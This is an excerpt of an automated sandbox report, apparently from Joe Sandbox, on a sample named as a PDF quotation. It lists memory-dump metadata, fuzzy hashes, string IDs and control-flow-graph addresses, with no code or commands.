                                                                  • Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6_H
                                                                  • API String ID: 0-1318916205
                                                                  • Opcode ID: 2658b7cc6a262212a5cc741250b9d2d2c3c64c7d68dd719dcdd0f2bac99468bb
                                                                  • Instruction ID: 028d91c03e13fd817371703e00a82180f78a2d93543d658de88d85cdfc4cbffe
                                                                  • Opcode Fuzzy Hash: 2658b7cc6a262212a5cc741250b9d2d2c3c64c7d68dd719dcdd0f2bac99468bb
                                                                  • Instruction Fuzzy Hash: 6C12D730D0D65ECFEBA4EF6884556BDB7B1FF59345F5001BAD00EA2291CB78A885CB40

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 846 7ff849093759-7ff849093783 847 7ff849093785-7ff84909379d 846->847 848 7ff84909379e-7ff8490937a0 846->848 847->848 850 7ff8490937a3 848->850 851 7ff8490937e4-7ff8490937f7 848->851 852 7ff8490937a5-7ff8490937bd 850->852 853 7ff8490937be 850->853 854 7ff8490937f9 851->854 855 7ff8490937fe-7ff849093816 851->855 852->853 857 7ff8490937bf-7ff8490937e3 852->857 853->857 854->855 859 7ff849093a3b-7ff849093a53 855->859 857->851 861 7ff849093a59-7ff849093a5e 859->861 862 7ff84909381b-7ff84909381f 859->862 863 7ff849093a60-7ff849093a9a 861->863 864 7ff849093a9d-7ff849093ab8 861->864 865 7ff849093821-7ff8490938bb 862->865 866 7ff849093827-7ff84909382c 862->866 863->864 873 7ff8490938c3-7ff8490938c8 865->873 874 7ff8490938bd-7ff849093957 865->874 869 7ff84909382e-7ff849093842 866->869 870 7ff84909385f-7ff849093876 866->870 880 7ff84909384a-7ff84909384f 869->880 884 7ff849093877-7ff849093893 870->884 877 7ff8490938ca-7ff8490938f8 873->877 878 7ff8490938fb-7ff84909393c 873->878 881 7ff849093959-7ff8490939f1 874->881 882 7ff84909395f-7ff849093964 874->882 877->878 908 7ff84909394d-7ff84909394e 878->908 909 7ff84909393e-7ff849093946 878->909 890 7ff849093857-7ff84909385c 880->890 891 7ff849093a30-7ff849093a34 881->891 892 7ff8490939f3-7ff8490939fe 881->892 887 7ff849093966-7ff849093994 882->887 888 7ff849093997-7ff8490939d8 882->888 904 7ff849093895-7ff849093898 884->904 905 7ff849093899-7ff84909389d 884->905 887->888 914 7ff8490939e9-7ff8490939ea 888->914 915 7ff8490939da-7ff8490939e2 888->915 890->870 891->859 892->891 901 7ff849093a37-7ff849093a3a 892->901 901->859 904->905 905->884 906 7ff84909389f-7ff8490938a0 905->906 910 7ff8490938b1-7ff8490938b2 906->910 911 7ff8490938a2-7ff8490938aa 906->911 908->859 909->908 910->859 911->910 914->859 915->914
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6_H
                                                                  • API String ID: 0-1318916205
                                                                  • Opcode ID: 11010d613666c86fe7114e2d6507a3f71c89b73334a718602a738ff130947fdf
                                                                  • Instruction ID: e14c1be07d2dd1a48f28a85f334b0506a4773bc344d14650e2baf731ba8dd30a
                                                                  • Opcode Fuzzy Hash: 11010d613666c86fe7114e2d6507a3f71c89b73334a718602a738ff130947fdf
                                                                  • Instruction Fuzzy Hash: 56C14C31D0CA9A8FEBA5EF68C4556B97BF1FF59354F10017AD009E31A2CB38A885CB50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 916 7ff848f409a5-7ff848f409d8 918 7ff848f409da-7ff848f409f6 916->918 919 7ff848f40a22-7ff848f40a31 916->919 921 7ff848f409f8-7ff848f409fb 918->921 922 7ff848f40a4f-7ff848f40a6c 918->922 919->922 924 7ff848f409fd-7ff848f40a04 921->924 925 7ff848f40a7c-7ff848f40a9e 921->925 928 7ff848f40a6e-7ff848f40a79 922->928 929 7ff848f40ab6-7ff848f40acb 922->929 924->919 930 7ff848f40b1f-7ff848f40b23 925->930 931 7ff848f40aa0-7ff848f40aa2 925->931 928->925 950 7ff848f40ad2-7ff848f40ad5 call 7ff848f404c8 929->950 932 7ff848f40b26-7ff848f40b29 930->932 933 7ff848f40b24-7ff848f40b25 930->933 934 7ff848f40b1e 931->934 935 7ff848f40aa4-7ff848f40aa8 931->935 937 7ff848f40b2a-7ff848f40b2e 932->937 933->932 934->930 935->933 941 7ff848f40aaa 935->941 940 7ff848f40b30-7ff848f40b35 937->940 943 7ff848f40b38-7ff848f40b4d 940->943 944 7ff848f40b37 940->944 945 7ff848f40aec-7ff848f40af5 941->945 946 7ff848f40aac-7ff848f40aae 941->946 953 7ff848f40b4f-7ff848f40b70 943->953 944->943 947 7ff848f40b3f-7ff848f40b4d 945->947 948 7ff848f40af7-7ff848f40b17 945->948 946->937 949 7ff848f40ab0-7ff848f40ab4 946->949 947->953 949->929 949->940 959 7ff848f40ada-7ff848f40aeb call 7ff848f40aec 950->959 956 7ff848f40b72-7ff848f40b74 953->956 957 7ff848f40bd7-7ff848f40bf1 953->957 960 7ff848f40b7f-7ff848f40b92 956->960 958 7ff848f40bf7-7ff848f40c08 957->958 961 7ff848f40c0a 958->961 962 7ff848f40c0f-7ff848f40c16 958->962 960->958 964 7ff848f40b94-7ff848f40bcf 960->964 961->962 965 7ff848f40c18-7ff848f40c27 call 7ff848f40508 962->965 971 7ff848f40c2e-7ff848f40c5e 965->971
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HbH
                                                                  • API String ID: 0-3628727451
                                                                  • Opcode ID: fec87c37ae61cdb54a322d2d7bd777217a2a979add725e9759767856f1ea200e
                                                                  • Instruction ID: 727a0bf11ad546e21124879630f36a0a535ac4f6b5d5b0750a9e5f91a131f12d
                                                                  • Opcode Fuzzy Hash: fec87c37ae61cdb54a322d2d7bd777217a2a979add725e9759767856f1ea200e
                                                                  • Instruction Fuzzy Hash: FD91153190CA8A4FE795FF2488152A97BE1FFA5754F0401BBD849D71D3DB38A8068B45

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1131 7ff848f408b5-7ff848f408f6 call 7ff848f404a8 1138 7ff848f408f8-7ff848f40906 1131->1138 1140 7ff848f4090c-7ff848f4091d 1138->1140 1141 7ff848f4091f-7ff848f4092c 1140->1141 1142 7ff848f4097e-7ff848f40983 1140->1142 1144 7ff848f4092e-7ff848f40963 1141->1144 1145 7ff848f40969-7ff848f4097c 1144->1145 1145->1141 1145->1142
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: _H
                                                                  • API String ID: 0-1700728219
                                                                  • Opcode ID: cdf1bb6bb146ebf634a683c5b3152a5f948e83fec4189e0e35d48c0c6aa0fa8b
                                                                  • Instruction ID: 2423fae897679b292e6c8639e20ee07a3acea9f83ce70f60322c98dcbe010d8e
                                                                  • Opcode Fuzzy Hash: cdf1bb6bb146ebf634a683c5b3152a5f948e83fec4189e0e35d48c0c6aa0fa8b
                                                                  • Instruction Fuzzy Hash: 4C317170A08A4DCFDB84EF6CC4846ADBBF1FF98310F1046AAD049D72A2D7349985CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 27eb1259e706f37b108c181db5e8c25af21f4eb0aa26973c2e6eb874c1f5ab29
                                                                  • Instruction ID: 5f901e274fbd462ad0482726d2caf7f6f5b17eda7c507126acb992faa1c99eb3
                                                                  • Opcode Fuzzy Hash: 27eb1259e706f37b108c181db5e8c25af21f4eb0aa26973c2e6eb874c1f5ab29
                                                                  • Instruction Fuzzy Hash: 9E125970E0C95E9FEFA4EF5898457B977A1FF68794F1001B5D00DE32A5DB38A9818B80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 34da1f08f1fc4fbb47ec7b792c69841ebebb051eaf5e72855abf5477bd0da2ea
                                                                  • Instruction ID: dca224a782fefd86b9d6374324a6a732ce925b68a6b5daf993465dc48c861a3a
                                                                  • Opcode Fuzzy Hash: 34da1f08f1fc4fbb47ec7b792c69841ebebb051eaf5e72855abf5477bd0da2ea
                                                                  • Instruction Fuzzy Hash: 0FA1E331C1D69A8FE74AEB6898651E97BB0FF22754F0802BBD048EB1D3DF286805C755
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 60f6b76408651f419cbdfdcebfbd513beb4d3a47b02807dcc090447855292b25
                                                                  • Instruction ID: 3af6687cc0117a3fa3fe5aa2685c3b7f219b6ac4d02b67229403da611682291f
                                                                  • Opcode Fuzzy Hash: 60f6b76408651f419cbdfdcebfbd513beb4d3a47b02807dcc090447855292b25
                                                                  • Instruction Fuzzy Hash: 4281D330A18A5D8FDB94EF68C855BADB7B1FF58345F5000BAD00EE32A1DB34A980DB04
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c01885fd8852352567b6fc026b099761fb07acac67b9585948799ed1de958f94
                                                                  • Instruction ID: e348c994d609abc5c7a6ce40538976d39f2cd7ce7530dbd69183cfc147dca775
                                                                  • Opcode Fuzzy Hash: c01885fd8852352567b6fc026b099761fb07acac67b9585948799ed1de958f94
                                                                  • Instruction Fuzzy Hash: 1B612631D0CB998FE755EF6898462E97BE0FF55710F04427BD048D3292CB346889CB86
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f902c236293f274b5c0e22b2eb67df29b26e6160ce262bf7f59b0a2bbd6ae8b9
                                                                  • Instruction ID: bd9d27934ad73788fdcea43c85ef7f91fe5eef23b34f02f124abbffb27e8a952
                                                                  • Opcode Fuzzy Hash: f902c236293f274b5c0e22b2eb67df29b26e6160ce262bf7f59b0a2bbd6ae8b9
                                                                  • Instruction Fuzzy Hash: D3511431E0C9598FE795EB6C84447B87BE2FFD9BA0F1441BAD44DD7287CA299C428780
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 40cc0a53353d46ad55f6fe15e2dc23b66f1422f1539d4665b088c811528c1005
                                                                  • Instruction ID: 019398e8c201bc9dbb946f8b761e0c207a697a527c9584a9898c3ef0e244f5ed
                                                                  • Opcode Fuzzy Hash: 40cc0a53353d46ad55f6fe15e2dc23b66f1422f1539d4665b088c811528c1005
                                                                  • Instruction Fuzzy Hash: 20619232C1E6D69FE756EB6858A50E57BB0FF22758F0802F7C0889E0D3EF1968458359
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9a72a98b6f5fe7b07e9de5937d696f835585b3d168be4584681421e0393b40ae
                                                                  • Instruction ID: 166689511bce5611f543d341c0d534e6dfebdb16968a452e341c59da46a18a6e
                                                                  • Opcode Fuzzy Hash: 9a72a98b6f5fe7b07e9de5937d696f835585b3d168be4584681421e0393b40ae
                                                                  • Instruction Fuzzy Hash: 4851B032C1E6D69FE756AB6858A50E57BB0EF22758F0802F7C0849F0D3EF1868098359
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e883f9292e745fd5f92ef032a15ee10771f8e9b8ef43c4b0914fe8e43f1902c7
                                                                  • Instruction ID: 1a323440ef096c447ec1b32d1f722a89951a65b8b75ea159f2c1770bc873e177
                                                                  • Opcode Fuzzy Hash: e883f9292e745fd5f92ef032a15ee10771f8e9b8ef43c4b0914fe8e43f1902c7
                                                                  • Instruction Fuzzy Hash: 3251A132C1DAD69FE35AAB6898A90E57BB0FF22B54F0801F7C4849B0D3EE1965068355
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6572e6f5983c4c339a463f799e421d9b3852b7829a80cddf49053a9cd7f3556c
                                                                  • Instruction ID: de0d15821a8f444352963f9fc603b4e6910b54379759ffedb4440956a183e95f
                                                                  • Opcode Fuzzy Hash: 6572e6f5983c4c339a463f799e421d9b3852b7829a80cddf49053a9cd7f3556c
                                                                  • Instruction Fuzzy Hash: E941F531A0CA094FEB98FB28980A6B977F1FFE5750F10417BD409D7187EE29A8428784
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 81b1c6545a0f9a201141c021d685281ebdf2bf09a1ed438f665398f49cb54d0f
                                                                  • Instruction ID: 29898b7089d76e825e23a3fa17df0d71437b458c3350b05078a0dee33d60e422
                                                                  • Opcode Fuzzy Hash: 81b1c6545a0f9a201141c021d685281ebdf2bf09a1ed438f665398f49cb54d0f
                                                                  • Instruction Fuzzy Hash: 1C417D31918B1C8FDB58EF58D8466E9BBF1FB98310F00826BD44D97256DB34A885CBC2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f67455a2851aa0f18d3dcb22ffbddd16f1507109c922916a5bd02135a37c93cb
                                                                  • Instruction ID: 2bbb3f49a03250f1bb62b41429b20ac264c7952319f0f9f8da3f0e56bcd1de61
                                                                  • Opcode Fuzzy Hash: f67455a2851aa0f18d3dcb22ffbddd16f1507109c922916a5bd02135a37c93cb
                                                                  • Instruction Fuzzy Hash: 8D41F676D0E64A9FE745FF5CE8925E933B0FF607ACF080277D008CA193EE2865468694
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9624e33fe506cc44df4a7f7a01f188bc8f82adba296446a317f7429c1d09b527
                                                                  • Instruction ID: 1a71325537db6212a6c91a69bfcfb5505c070508f9348bbf4ae867ac2b367944
                                                                  • Opcode Fuzzy Hash: 9624e33fe506cc44df4a7f7a01f188bc8f82adba296446a317f7429c1d09b527
                                                                  • Instruction Fuzzy Hash: 7F418F30A09A4D8FDB84EFA8C454AEDBBF1FF99340F10017AD409E7295DB34A986CB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aeacb1ce8f0b7a2008d71fcdd7a30da34f8c95237a070ca17cf60c17ff0add74
                                                                  • Instruction ID: e3408bebb2dd85db7246bc05dd9adda03fc3d558d29da511d238de7b8d5077c4
                                                                  • Opcode Fuzzy Hash: aeacb1ce8f0b7a2008d71fcdd7a30da34f8c95237a070ca17cf60c17ff0add74
                                                                  • Instruction Fuzzy Hash: C941EF31A0C54E8FDB45EF68D4906FABBA1EF85394F5401BAC009E7281CB386985CB95
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 492b4ea394c847c6d2890f07dd7769ca40bcda4670bccbdbb4e707d6dd4cdca2
                                                                  • Instruction ID: 51ce0e8d7fa473f0ca9e02cbc5e16ff07ac5696477ea3443b6a771d8e70e445d
                                                                  • Opcode Fuzzy Hash: 492b4ea394c847c6d2890f07dd7769ca40bcda4670bccbdbb4e707d6dd4cdca2
                                                                  • Instruction Fuzzy Hash: F7410870D0C55A8EEFB8EF5888457BDB7A1FF59398F104179D00DA21A5CB38A985CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: da5295eb67721b1d45a24f8c5dec8a0b9a1b3f5053f65ba1e3676fd306c080a9
                                                                  • Instruction ID: 2f4f0f00fff132168f454a7e2b9bc317652d1c7324de5e606b2839a977ce910b
                                                                  • Opcode Fuzzy Hash: da5295eb67721b1d45a24f8c5dec8a0b9a1b3f5053f65ba1e3676fd306c080a9
                                                                  • Instruction Fuzzy Hash: CA31F83290D6999FDB46EF2CD8565D97BB0FF12319F0802B3D04CCA0A3DB28A495C795
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e8e6400eebaf53c8ab7fab181955cd15b3f925098e0da5bae128f3c528c500aa
                                                                  • Instruction ID: 283692521be11e12bd7675fa922d06dc861ceb917cee90bc5f80008cf4a2f44a
                                                                  • Opcode Fuzzy Hash: e8e6400eebaf53c8ab7fab181955cd15b3f925098e0da5bae128f3c528c500aa
                                                                  • Instruction Fuzzy Hash: AE31FD70E0895E9FEFA4EF58C4456ADB7B1FF58754F104179D009E3295DB38A8828F90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4645ba79407df2eeaedb85465232e218018880e67aa5f446e9c199e4ad59370a
                                                                  • Instruction ID: e8a35e94df61671c4e1ffb4931519c98cbdad60ebdb5910b9c98426eb58485cc
                                                                  • Opcode Fuzzy Hash: 4645ba79407df2eeaedb85465232e218018880e67aa5f446e9c199e4ad59370a
                                                                  • Instruction Fuzzy Hash: 3E312632A0E55E9EE744BB68A4511FA7BA0FF413A8F080277D00CDA183CF2C5845C7A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c10aa9e4b5097f1cf8de7e06df1d1752a9acf68040963dd554fb7c0d2c8b5d23
                                                                  • Instruction ID: 2f9d8996131f9444f0fc22f2673fe27234bbf85923ddbfdb00d444aaae59b2f6
                                                                  • Opcode Fuzzy Hash: c10aa9e4b5097f1cf8de7e06df1d1752a9acf68040963dd554fb7c0d2c8b5d23
                                                                  • Instruction Fuzzy Hash: 21319330E0891D8FDBA4EFA8D455AADB7B1FF98395F50017AD00DE3291CB35A886CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bdc368efed0445f656ced4aff3407999f76dd202a8b895c82048b792a085b81b
                                                                  • Instruction ID: b190de1df6136c04883f1fad26332017d0319cfd2c994682023d132b0a663042
                                                                  • Opcode Fuzzy Hash: bdc368efed0445f656ced4aff3407999f76dd202a8b895c82048b792a085b81b
                                                                  • Instruction Fuzzy Hash: 5141B77190991D8FDBA8EF14C854AE9B7F1FB64301F1041EE804EE32A0CE71AA81CF81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c74e8cb9ee0041dfb7e167fa635e8ada71ebfeae3fa589680f983a415e3e4ac6
                                                                  • Instruction ID: 133ca109075cddd26fc28e1d166270c46ac687eafc260438c234ad88e0c9c33c
                                                                  • Opcode Fuzzy Hash: c74e8cb9ee0041dfb7e167fa635e8ada71ebfeae3fa589680f983a415e3e4ac6
                                                                  • Instruction Fuzzy Hash: D031C430E0892D8EEBA4EF68D4557ACB3B1FB98391F5001BAD00DE2291CB34A9858F50
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2750577f829f0498cf27b2086c2ebc8db2cd7c2ae3651c2406c401b153126a8d
                                                                  • Instruction ID: d4005e21a96374b9c080be5a2613fff3aef68bd63e29c68d12c5df60d05e35c9
                                                                  • Opcode Fuzzy Hash: 2750577f829f0498cf27b2086c2ebc8db2cd7c2ae3651c2406c401b153126a8d
                                                                  • Instruction Fuzzy Hash: 8A21FB3590CA4E8FDB85FF24C8446EA7BB1FF95300F1041ABD809D7295DB74A946CB85
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 204ec5e0a9dbd4e958f44e16ec684ea676cd5bf9cda5aa11d59c4d78a3a86d83
                                                                  • Instruction ID: 86de6ba9b887a4cac749b685dd1741ff2cc1ac35ab6222bd1216adfebebd0a94
                                                                  • Opcode Fuzzy Hash: 204ec5e0a9dbd4e958f44e16ec684ea676cd5bf9cda5aa11d59c4d78a3a86d83
                                                                  • Instruction Fuzzy Hash: 4D210A3090C68E8FDB85EF24C8446EA7FF1FF95300F1441AAD809D7296CB789586CB45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6967b47b1094d0d27905cf7184c8b6c896e9a5bbb579b5a2119775a338abe6f3
                                                                  • Instruction ID: ea594e56829b293307800b89c230b2c50430138d97bc5914e609915b105b30c9
                                                                  • Opcode Fuzzy Hash: 6967b47b1094d0d27905cf7184c8b6c896e9a5bbb579b5a2119775a338abe6f3
                                                                  • Instruction Fuzzy Hash: C821C232D0C99E4EF7E0B72498152BA76D0EFE5794F0401BBD81CE30C3EF6869198689
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
